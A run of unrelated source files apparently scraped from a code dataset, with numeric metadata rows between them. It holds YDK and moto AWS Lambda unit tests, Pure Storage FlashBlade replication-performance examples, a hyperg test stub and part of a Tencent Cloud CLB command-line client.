    from ydk.models.ietf.policy_types import AtmClp
    from ydk.models.ietf.policy_types import AtmVci
    from ydk.models.ietf.policy_types import Dei
    from ydk.models.ietf.policy_types import DeiInner
    from ydk.models.ietf.policy_types import FlowIp
    from ydk.models.ietf.policy_types import FlowRecord
    from ydk.models.ietf.policy_types import FlowDe
    from ydk.models.ietf.policy_types import FlowDlci
    from ydk.models.ietf.policy_types import WlanUserPriority
    from ydk.models.ietf.policy_types import DiscardClass
    from ydk.models.ietf.policy_types import ClassMap
    from ydk.models.ietf.policy_types import Metadata
    from ydk.models.ietf.policy_types import Application
    from ydk.models.ietf.policy_types import SecurityGroupName
    from ydk.models.ietf.policy_types import SecurityGroupTag
    from ydk.models.ietf.policy_types import IpRtp
    from ydk.models.ietf.policy_types import Vpls
    from ydk.models.ietf.policy_types import Metric
    from ydk.models.ietf.policy_types import RateUnit
    from ydk.models.ietf.policy_types import Direction
def test_tailf_cli_extensions(self):
pass
def test_tailf_common(self):
pass
def test_tailf_common_monitoring(self):
pass
def test_tailf_common_query(self):
pass
def test_tailf_confd_monitoring(self):
from ydk.models.cisco_ios_xe.tailf_confd_monitoring import ConfdState
def test_tailf_meta_extensions(self):
pass
def test_tailf_netconf_inactive(self):
pass
def test_tailf_netconf_monitoring(self):
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import CliConsole
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import CliSsh
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import CliTcp
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import WebuiHttp
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import WebuiHttps
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import NetconfTcp
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import SnmpUdp
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import RestHttp
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import RestHttps
def test_tailf_netconf_query(self):
from ydk.models.cisco_ios_xe.tailf_netconf_query import StartQuery
from ydk.models.cisco_ios_xe.tailf_netconf_query import FetchQueryResult
from ydk.models.cisco_ios_xe.tailf_netconf_query import ImmediateQuery
from ydk.models.cisco_ios_xe.tailf_netconf_query import ResetQuery
from ydk.models.cisco_ios_xe.tailf_netconf_query import StopQuery
def test_tailf_netconf_transactions(self):
from ydk.models.cisco_ios_xe.tailf_netconf_transactions import StartTransaction
from ydk.models.cisco_ios_xe.tailf_netconf_transactions import PrepareTransaction
from ydk.models.cisco_ios_xe.tailf_netconf_transactions import CommitTransaction
from ydk.models.cisco_ios_xe.tailf_netconf_transactions import AbortTransaction
def test_tailf_rest_error(self):
pass
def test_tailf_rest_query(self):
pass
def test_tailf_xsd_types(self):
pass
if __name__ == '__main__':
unittest.main()
| 41.209221
| 115
| 0.785254
| 14,084
| 94,740
| 4.868858
| 0.088966
| 0.152013
| 0.190016
| 0.233882
| 0.736996
| 0.712598
| 0.694661
| 0.666939
| 0.638881
| 0.528182
| 0
| 0.003055
| 0.17073
| 94,740
| 2,298
| 116
| 41.227154
| 0.869764
| 0
| 0
| 0.150232
| 0
| 0
| 0.000084
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.258769
| false
| 0.080741
| 0.659828
| 0
| 0.919259
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
ce8892dc9f3de1fed384e61657f0b3e13aaf1818
| 13,752
|
py
|
Python
|
tests/test_awslambda/test_lambda.py
|
argos83/moto
|
d3df810065c9c453d40fcc971f9be6b7b2846061
|
[
"Apache-2.0"
] | 1
|
2021-03-06T22:01:41.000Z
|
2021-03-06T22:01:41.000Z
|
tests/test_awslambda/test_lambda.py
|
marciogh/moto
|
d3df810065c9c453d40fcc971f9be6b7b2846061
|
[
"Apache-2.0"
] | null | null | null |
tests/test_awslambda/test_lambda.py
|
marciogh/moto
|
d3df810065c9c453d40fcc971f9be6b7b2846061
|
[
"Apache-2.0"
] | 1
|
2017-10-19T00:53:28.000Z
|
2017-10-19T00:53:28.000Z
|
from __future__ import unicode_literals
import base64
import botocore.client
import boto3
import hashlib
import io
import json
import zipfile
import sure # noqa
from freezegun import freeze_time
from moto import mock_lambda, mock_s3, mock_ec2
def _process_lamda(pfunc):
    """Package *pfunc* (lambda handler source text) into an in-memory ZIP.

    Returns the raw bytes of a ZIP archive containing a single entry
    named 'lambda_function.zip' whose contents are *pfunc*.

    NOTE(review): the function name keeps its historical misspelling
    ("lamda") because the in-file get_test_zip_file* helpers call it.
    """
    zip_output = io.BytesIO()
    # Context manager finalizes and closes the archive even if writestr
    # raises; the original left the ZipFile open on the error path.
    with zipfile.ZipFile(zip_output, 'w', zipfile.ZIP_DEFLATED) as zip_file:
        zip_file.writestr('lambda_function.zip', pfunc)
    zip_output.seek(0)
    return zip_output.read()
def get_test_zip_file1():
    """Return zip bytes for a trivial echo handler (returns its event)."""
    handler_source = """
def lambda_handler(event, context):
    return event
"""
    return _process_lamda(handler_source)
def get_test_zip_file2():
    """Return zip bytes for a handler that looks up an EC2 volume.

    The packaged handler reads 'volume_id' from the event, prints the
    volume's state and size via boto3, and echoes the event back.
    """
    handler_source = """
def lambda_handler(event, context):
    volume_id = event.get('volume_id')
    print('get volume details for %s' % volume_id)
    import boto3
    ec2 = boto3.resource('ec2', region_name='us-west-2')
    vol = ec2.Volume(volume_id)
    print('Volume - %s  state=%s, size=%s' % (volume_id, vol.state, vol.size))
    return event
"""
    return _process_lamda(handler_source)
@mock_lambda
@mock_s3
def test_list_functions():
    """With no functions created, list_functions returns an empty list."""
    client = boto3.client('lambda', 'us-west-2')
    listing = client.list_functions()
    listing['Functions'].should.have.length_of(0)
@mock_lambda
@freeze_time('2015-01-01 00:00:00')
def test_invoke_requestresponse_function():
    """Create a function and invoke it synchronously (RequestResponse).

    The echo handler from get_test_zip_file1() returns the event, so both
    the base64 LogResult and the Payload stream should round-trip the
    input JSON.
    """
    conn = boto3.client('lambda', 'us-west-2')
    conn.create_function(
        FunctionName='testFunction',
        Runtime='python2.7',
        Role='test-iam-role',
        Handler='lambda_function.handler',
        Code={
            'ZipFile': get_test_zip_file1(),
        },
        Description='test lambda function',
        Timeout=3,
        MemorySize=128,
        Publish=True,
    )
    in_data = {'msg': 'So long and thanks for all the fish'}
    success_result = conn.invoke(FunctionName='testFunction', InvocationType='RequestResponse',
                                 Payload=json.dumps(in_data))
    # NOTE(review): real AWS returns 200 for RequestResponse (202 is for
    # Event invocations); 202 here matches this moto version's behaviour —
    # confirm against the mocked backend before "fixing" either side.
    success_result["StatusCode"].should.equal(202)
    # LogResult is base64-encoded; the echo handler emits the input verbatim.
    base64.b64decode(success_result["LogResult"]).decode('utf-8').should.equal(json.dumps(in_data))
    json.loads(success_result["Payload"].read().decode('utf-8')).should.equal(in_data)
@mock_lambda
@freeze_time('2015-01-01 00:00:00')
def test_invoke_event_function():
    """Asynchronous (Event) invocation: unknown names fail, known ones 202."""
    conn = boto3.client('lambda', 'us-west-2')
    conn.create_function(
        FunctionName='testFunction',
        Runtime='python2.7',
        Role='test-iam-role',
        Handler='lambda_function.handler',
        Code={
            'ZipFile': get_test_zip_file1(),
        },
        Description='test lambda function',
        Timeout=3,
        MemorySize=128,
        Publish=True,
    )
    # Invoking a function that was never created must raise ClientError.
    conn.invoke.when.called_with(
        FunctionName='notAFunction',
        InvocationType='Event',
        Payload='{}'
    ).should.throw(botocore.client.ClientError)
    in_data = {'msg': 'So long and thanks for all the fish'}
    success_result = conn.invoke(FunctionName='testFunction', InvocationType='Event', Payload=json.dumps(in_data))
    # 202 Accepted is the documented status for async (Event) invocations.
    success_result["StatusCode"].should.equal(202)
    # Event invocations carry no result body; this moto version returns '{}'.
    json.loads(success_result['Payload'].read().decode('utf-8')).should.equal({})
@mock_ec2
@mock_lambda
@freeze_time('2015-01-01 00:00:00')
def test_invoke_function_get_ec2_volume():
    """Invoke a handler that itself calls the (mocked) EC2 API.

    The zip from get_test_zip_file2() looks up a volume by id and prints
    its state/size; the handler's stdout comes back base64-encoded in
    LogResult and (in this moto version) also as the Payload.
    """
    conn = boto3.resource("ec2", "us-west-2")
    vol = conn.create_volume(Size=99, AvailabilityZone='us-west-2')
    vol = conn.Volume(vol.id)  # re-fetch handle so state/size are populated
    conn = boto3.client('lambda', 'us-west-2')
    conn.create_function(
        FunctionName='testFunction',
        Runtime='python2.7',
        Role='test-iam-role',
        Handler='lambda_function.handler',
        Code={
            'ZipFile': get_test_zip_file2(),
        },
        Description='test lambda function',
        Timeout=3,
        MemorySize=128,
        Publish=True,
    )
    in_data = {'volume_id': vol.id}
    result = conn.invoke(FunctionName='testFunction', InvocationType='RequestResponse', Payload=json.dumps(in_data))
    result["StatusCode"].should.equal(202)
    # Expected output: the handler's two print() lines plus the echoed event,
    # matched byte-for-byte against the zipped handler source above.
    msg = 'get volume details for %s\nVolume - %s  state=%s, size=%s\n%s' % (vol.id, vol.id, vol.state, vol.size, json.dumps(in_data))
    base64.b64decode(result["LogResult"]).decode('utf-8').should.equal(msg)
    result['Payload'].read().decode('utf-8').should.equal(msg)
@mock_lambda
@freeze_time('2015-01-01 00:00:00')
def test_create_based_on_s3_with_missing_bucket():
    """create_function pointing at a nonexistent S3 bucket raises ClientError."""
    client = boto3.client('lambda', 'us-west-2')
    create_kwargs = dict(
        FunctionName='testFunction',
        Runtime='python2.7',
        Role='test-iam-role',
        Handler='lambda_function.handler',
        Code={
            'S3Bucket': 'this-bucket-does-not-exist',
            'S3Key': 'test.zip',
        },
        Description='test lambda function',
        Timeout=3,
        MemorySize=128,
        Publish=True,
        VpcConfig={
            "SecurityGroupIds": ["sg-123abc"],
            "SubnetIds": ["subnet-123abc"],
        },
    )
    client.create_function.when.called_with(
        **create_kwargs
    ).should.throw(botocore.client.ClientError)
@mock_lambda
@mock_s3
@freeze_time('2015-01-01 00:00:00')
def test_create_function_from_aws_bucket():
    """create_function with S3-hosted code returns the full config dict.

    Uploads a real zip to a mocked bucket first, then checks the create
    response against an exact expected dictionary (time frozen so
    LastModified is deterministic).
    """
    s3_conn = boto3.client('s3', 'us-west-2')
    s3_conn.create_bucket(Bucket='test-bucket')
    zip_content = get_test_zip_file2()
    s3_conn.put_object(Bucket='test-bucket', Key='test.zip', Body=zip_content)
    conn = boto3.client('lambda', 'us-west-2')
    result = conn.create_function(
        FunctionName='testFunction',
        Runtime='python2.7',
        Role='test-iam-role',
        Handler='lambda_function.handler',
        Code={
            'S3Bucket': 'test-bucket',
            'S3Key': 'test.zip',
        },
        Description='test lambda function',
        Timeout=3,
        MemorySize=128,
        Publish=True,
        VpcConfig={
            "SecurityGroupIds": ["sg-123abc"],
            "SubnetIds": ["subnet-123abc"],
        },
    )
    result['ResponseMetadata'].pop('HTTPHeaders', None)  # this is hard to match against, so remove it
    result['ResponseMetadata'].pop('RetryAttempts', None)  # Botocore inserts retry attempts not seen in Python27
    result.should.equal({
        'FunctionName': 'testFunction',
        'FunctionArn': 'arn:aws:lambda:123456789012:function:testFunction',
        'Runtime': 'python2.7',
        'Role': 'test-iam-role',
        'Handler': 'lambda_function.handler',
        # Sha256/size are derived from the uploaded zip so the test does not
        # hard-code values that change whenever the fixture zip changes.
        "CodeSha256": hashlib.sha256(zip_content).hexdigest(),
        "CodeSize": len(zip_content),
        'Description': 'test lambda function',
        'Timeout': 3,
        'MemorySize': 128,
        'LastModified': '2015-01-01 00:00:00',
        'Version': '$LATEST',
        'VpcConfig': {
            "SecurityGroupIds": ["sg-123abc"],
            "SubnetIds": ["subnet-123abc"],
            # NOTE(review): VpcId appears synthesized by the moto backend —
            # confirm; it is not part of the request above.
            "VpcId": "vpc-123abc"
        },
        'ResponseMetadata': {'HTTPStatusCode': 201},
    })
@mock_lambda
@freeze_time('2015-01-01 00:00:00')
def test_create_function_from_zipfile():
    """create_function with inline ZipFile bytes returns the full config dict."""
    conn = boto3.client('lambda', 'us-west-2')
    zip_content = get_test_zip_file1()
    result = conn.create_function(
        FunctionName='testFunction',
        Runtime='python2.7',
        Role='test-iam-role',
        Handler='lambda_function.handler',
        Code={
            'ZipFile': zip_content,
        },
        Description='test lambda function',
        Timeout=3,
        MemorySize=128,
        Publish=True,
    )
    result['ResponseMetadata'].pop('HTTPHeaders', None)  # this is hard to match against, so remove it
    result['ResponseMetadata'].pop('RetryAttempts', None)  # Botocore inserts retry attempts not seen in Python27
    result.should.equal({
        'FunctionName': 'testFunction',
        'FunctionArn': 'arn:aws:lambda:123456789012:function:testFunction',
        'Runtime': 'python2.7',
        'Role': 'test-iam-role',
        'Handler': 'lambda_function.handler',
        'CodeSize': len(zip_content),
        'Description': 'test lambda function',
        'Timeout': 3,
        'MemorySize': 128,
        'LastModified': '2015-01-01 00:00:00',  # deterministic via freeze_time
        'CodeSha256': hashlib.sha256(zip_content).hexdigest(),
        'Version': '$LATEST',
        'VpcConfig': {
            # No VpcConfig was supplied, so the backend reports empty lists.
            "SecurityGroupIds": [],
            "SubnetIds": [],
        },
        'ResponseMetadata': {'HTTPStatusCode': 201},
    })
@mock_lambda
@mock_s3
@freeze_time('2015-01-01 00:00:00')
def test_get_function():
    """get_function returns Code location plus the full Configuration block."""
    s3_conn = boto3.client('s3', 'us-west-2')
    s3_conn.create_bucket(Bucket='test-bucket')
    zip_content = get_test_zip_file1()
    s3_conn.put_object(Bucket='test-bucket', Key='test.zip', Body=zip_content)
    conn = boto3.client('lambda', 'us-west-2')
    conn.create_function(
        FunctionName='testFunction',
        Runtime='python2.7',
        Role='test-iam-role',
        Handler='lambda_function.handler',
        Code={
            'S3Bucket': 'test-bucket',
            'S3Key': 'test.zip',
        },
        Description='test lambda function',
        Timeout=3,
        MemorySize=128,
        Publish=True,
    )
    result = conn.get_function(FunctionName='testFunction')
    result['ResponseMetadata'].pop('HTTPHeaders', None)  # this is hard to match against, so remove it
    result['ResponseMetadata'].pop('RetryAttempts', None)  # Botocore inserts retry attempts not seen in Python27
    result.should.equal({
        "Code": {
            # NOTE(review): fixed placeholder URL emitted by this moto
            # version, not the bucket/key supplied above — confirm.
            "Location": "s3://lambda-functions.aws.amazon.com/test.zip",
            "RepositoryType": "S3"
        },
        "Configuration": {
            "CodeSha256": hashlib.sha256(zip_content).hexdigest(),
            "CodeSize": len(zip_content),
            "Description": "test lambda function",
            "FunctionArn": "arn:aws:lambda:123456789012:function:testFunction",
            "FunctionName": "testFunction",
            "Handler": "lambda_function.handler",
            "LastModified": "2015-01-01 00:00:00",
            "MemorySize": 128,
            "Role": "test-iam-role",
            "Runtime": "python2.7",
            "Timeout": 3,
            "Version": '$LATEST',
            "VpcConfig": {
                "SecurityGroupIds": [],
                "SubnetIds": [],
            }
        },
        'ResponseMetadata': {'HTTPStatusCode': 200},
    })
@mock_lambda
@mock_s3
def test_delete_function():
    """delete_function returns 204 for an existing function, ClientError otherwise."""
    s3_conn = boto3.client('s3', 'us-west-2')
    s3_conn.create_bucket(Bucket='test-bucket')
    zip_content = get_test_zip_file2()
    s3_conn.put_object(Bucket='test-bucket', Key='test.zip', Body=zip_content)
    conn = boto3.client('lambda', 'us-west-2')
    conn.create_function(
        FunctionName='testFunction',
        Runtime='python2.7',
        Role='test-iam-role',
        Handler='lambda_function.handler',
        Code={
            'S3Bucket': 'test-bucket',
            'S3Key': 'test.zip',
        },
        Description='test lambda function',
        Timeout=3,
        MemorySize=128,
        Publish=True,
    )
    success_result = conn.delete_function(FunctionName='testFunction')
    success_result['ResponseMetadata'].pop('HTTPHeaders', None)  # this is hard to match against, so remove it
    success_result['ResponseMetadata'].pop('RetryAttempts', None)  # Botocore inserts retry attempts not seen in Python27
    # A successful delete carries no body — 204 No Content only.
    success_result.should.equal({'ResponseMetadata': {'HTTPStatusCode': 204}})
    # Deleting a name that never existed must raise.
    conn.delete_function.when.called_with(FunctionName='testFunctionThatDoesntExist').should.throw(botocore.client.ClientError)
@mock_lambda
@mock_s3
@freeze_time('2015-01-01 00:00:00')
def test_list_create_list_get_delete_list():
    """
    test `list -> create -> list -> get -> delete -> list` integration
    """
    s3_conn = boto3.client('s3', 'us-west-2')
    s3_conn.create_bucket(Bucket='test-bucket')
    zip_content = get_test_zip_file2()
    s3_conn.put_object(Bucket='test-bucket', Key='test.zip', Body=zip_content)
    conn = boto3.client('lambda', 'us-west-2')
    # Baseline: nothing registered yet.
    conn.list_functions()['Functions'].should.have.length_of(0)
    conn.create_function(
        FunctionName='testFunction',
        Runtime='python2.7',
        Role='test-iam-role',
        Handler='lambda_function.handler',
        Code={
            'S3Bucket': 'test-bucket',
            'S3Key': 'test.zip',
        },
        Description='test lambda function',
        Timeout=3,
        MemorySize=128,
        Publish=True,
    )
    # Shared expectation: list_functions returns just the Configuration part,
    # get_function returns this whole structure.
    expected_function_result = {
        "Code": {
            "Location": "s3://lambda-functions.aws.amazon.com/test.zip",
            "RepositoryType": "S3"
        },
        "Configuration": {
            "CodeSha256": hashlib.sha256(zip_content).hexdigest(),
            "CodeSize": len(zip_content),
            "Description": "test lambda function",
            "FunctionArn": "arn:aws:lambda:123456789012:function:testFunction",
            "FunctionName": "testFunction",
            "Handler": "lambda_function.handler",
            "LastModified": "2015-01-01 00:00:00",
            "MemorySize": 128,
            "Role": "test-iam-role",
            "Runtime": "python2.7",
            "Timeout": 3,
            "Version": '$LATEST',
            "VpcConfig": {
                "SecurityGroupIds": [],
                "SubnetIds": [],
            }
        },
        'ResponseMetadata': {'HTTPStatusCode': 200},
    }
    conn.list_functions()['Functions'].should.equal([expected_function_result['Configuration']])
    func = conn.get_function(FunctionName='testFunction')
    func['ResponseMetadata'].pop('HTTPHeaders', None)  # this is hard to match against, so remove it
    func['ResponseMetadata'].pop('RetryAttempts', None)  # Botocore inserts retry attempts not seen in Python27
    func.should.equal(expected_function_result)
    conn.delete_function(FunctionName='testFunction')
    # After delete the listing is empty again.
    conn.list_functions()['Functions'].should.have.length_of(0)
| 32.665083
| 134
| 0.618965
| 1,529
| 13,752
| 5.41792
| 0.124264
| 0.04563
| 0.014365
| 0.023539
| 0.862989
| 0.809874
| 0.763761
| 0.728875
| 0.724288
| 0.709319
| 0
| 0.045817
| 0.233421
| 13,752
| 420
| 135
| 32.742857
| 0.739992
| 0.040503
| 0
| 0.712707
| 0
| 0.005525
| 0.314474
| 0.058323
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035912
| false
| 0
| 0.033149
| 0
| 0.082873
| 0.005525
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cec2afb657e979ae9386b3f7aa6db4346b2bb2df
| 1,806
|
py
|
Python
|
docs/source/examples/flashblade/get_array_connections_performance_replication.py
|
bcai-ps/py-pure-client
|
d23de5cde4f4db17b85b1ba137235ae368a59c8c
|
[
"BSD-2-Clause"
] | null | null | null |
docs/source/examples/flashblade/get_array_connections_performance_replication.py
|
bcai-ps/py-pure-client
|
d23de5cde4f4db17b85b1ba137235ae368a59c8c
|
[
"BSD-2-Clause"
] | null | null | null |
docs/source/examples/flashblade/get_array_connections_performance_replication.py
|
bcai-ps/py-pure-client
|
d23de5cde4f4db17b85b1ba137235ae368a59c8c
|
[
"BSD-2-Clause"
] | null | null | null |
# Examples for querying replication performance of array connections.
# Each call returns either a ValidResponse (items iterable) or an error
# response; use isinstance() rather than `type(x) == T` for the check.

# list instantaneous replication performance for all array connections
res = client.get_array_connections_performance_replication()
print(res)
if isinstance(res, pypureclient.responses.ValidResponse):
    print(list(res.items))

# list instantaneous file-replication performance for all array connections
res = client.get_array_connections_performance_replication(type='file-system')
print(res)
if isinstance(res, pypureclient.responses.ValidResponse):
    print(list(res.items))

# list instantaneous file-replication performance for array connection with id '10314f42-020d-7080-8013-000ddt400090'
res = client.get_array_connections_performance_replication(ids=['10314f42-020d-7080-8013-000ddt400090'],
                                                           type='file-system')
print(res)
if isinstance(res, pypureclient.responses.ValidResponse):
    print(list(res.items))

# list historical object-replication performance for all array connections between some
# start time and end time
res = client.get_array_connections_performance_replication(
    start_time=START_TIME,
    end_time=END_TIME,
    type='object-store',
    resolution=30000)
print(res)
if isinstance(res, pypureclient.responses.ValidResponse):
    print(list(res.items))

# list historical object-replication performance for array connection 'remote_array' between some
# start time and end time
res = client.get_array_connections_performance_replication(
    start_time=START_TIME,
    end_time=END_TIME,
    resolution=30000,
    type='object-store',
    names=['remote_array'])
print(res)
if isinstance(res, pypureclient.responses.ValidResponse):
    print(list(res.items))

# Other valid fields: continuation_token, filter, limit, offset, remote_ids, remote_names,
# sort, total_only
# See section "Common Fields" for examples
| 40.133333
| 117
| 0.754707
| 222
| 1,806
| 5.986486
| 0.256757
| 0.096313
| 0.094056
| 0.063958
| 0.82769
| 0.75696
| 0.742664
| 0.705041
| 0.705041
| 0.705041
| 0
| 0.041857
| 0.153378
| 1,806
| 44
| 118
| 41.045455
| 0.827338
| 0.36268
| 0
| 0.766667
| 0
| 0
| 0.082456
| 0.031579
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cedccd46fae43e720f9140d83a394a034a4505ee
| 162
|
py
|
Python
|
tests/learning/test_diffusion.py
|
iMoonLab/THU-HyperG
|
3b826c692c567672fa87dce1fa8dcfea555737e5
|
[
"MIT"
] | 48
|
2020-04-15T07:41:59.000Z
|
2022-03-26T06:08:12.000Z
|
tests/learning/test_diffusion.py
|
iMoonLab/THU-HyperG
|
3b826c692c567672fa87dce1fa8dcfea555737e5
|
[
"MIT"
] | 5
|
2021-02-07T23:44:07.000Z
|
2022-03-23T08:48:40.000Z
|
tests/learning/test_diffusion.py
|
iMoonLab/THU-Moon
|
3b826c692c567672fa87dce1fa8dcfea555737e5
|
[
"MIT"
] | 10
|
2020-05-22T03:46:11.000Z
|
2022-03-21T11:51:06.000Z
|
import numpy as np
from hyperg.hyperg import HyperG
from hyperg.learning.classification import cross_diffusion_infer
def test_cross_diffusion_infer():
    """Placeholder test for cross_diffusion_infer; no assertions yet."""
    # Intentionally empty: the docstring alone makes this a valid no-op body.
| 20.25
| 64
| 0.833333
| 23
| 162
| 5.652174
| 0.608696
| 0.153846
| 0.292308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 162
| 8
| 65
| 20.25
| 0.921986
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0.2
| 0.6
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
0cba18b8e33ed2e0e8a6bb0fb8e1f891c18515b4
| 83,778
|
py
|
Python
|
tccli/services/clb/clb_client.py
|
ivandksun/tencentcloud-cli-intl-en
|
41b84e339918961b8bc92f7498e56347d21e16d3
|
[
"Apache-2.0"
] | null | null | null |
tccli/services/clb/clb_client.py
|
ivandksun/tencentcloud-cli-intl-en
|
41b84e339918961b8bc92f7498e56347d21e16d3
|
[
"Apache-2.0"
] | 1
|
2022-02-07T13:39:09.000Z
|
2022-02-07T13:39:09.000Z
|
tccli/services/clb/clb_client.py
|
ivandksun/tencentcloud-cli-intl-en
|
41b84e339918961b8bc92f7498e56347d21e16d3
|
[
"Apache-2.0"
] | 4
|
2020-07-20T01:51:58.000Z
|
2021-08-13T08:25:22.000Z
|
# -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.clb.v20180317 import clb_client as clb_client_v20180317
from tencentcloud.clb.v20180317 import models as models_v20180317
def doRegisterTargets(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.RegisterTargetsRequest()
model.from_json_string(json.dumps(args))
rsp = client.RegisterTargets(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSetLoadBalancerSecurityGroups(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SetLoadBalancerSecurityGroupsRequest()
model.from_json_string(json.dumps(args))
rsp = client.SetLoadBalancerSecurityGroups(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeClassicalLBListeners(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeClassicalLBListenersRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeClassicalLBListeners(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCustomizedConfigAssociateList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCustomizedConfigAssociateListRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeCustomizedConfigAssociateList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeBlockIPTask(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
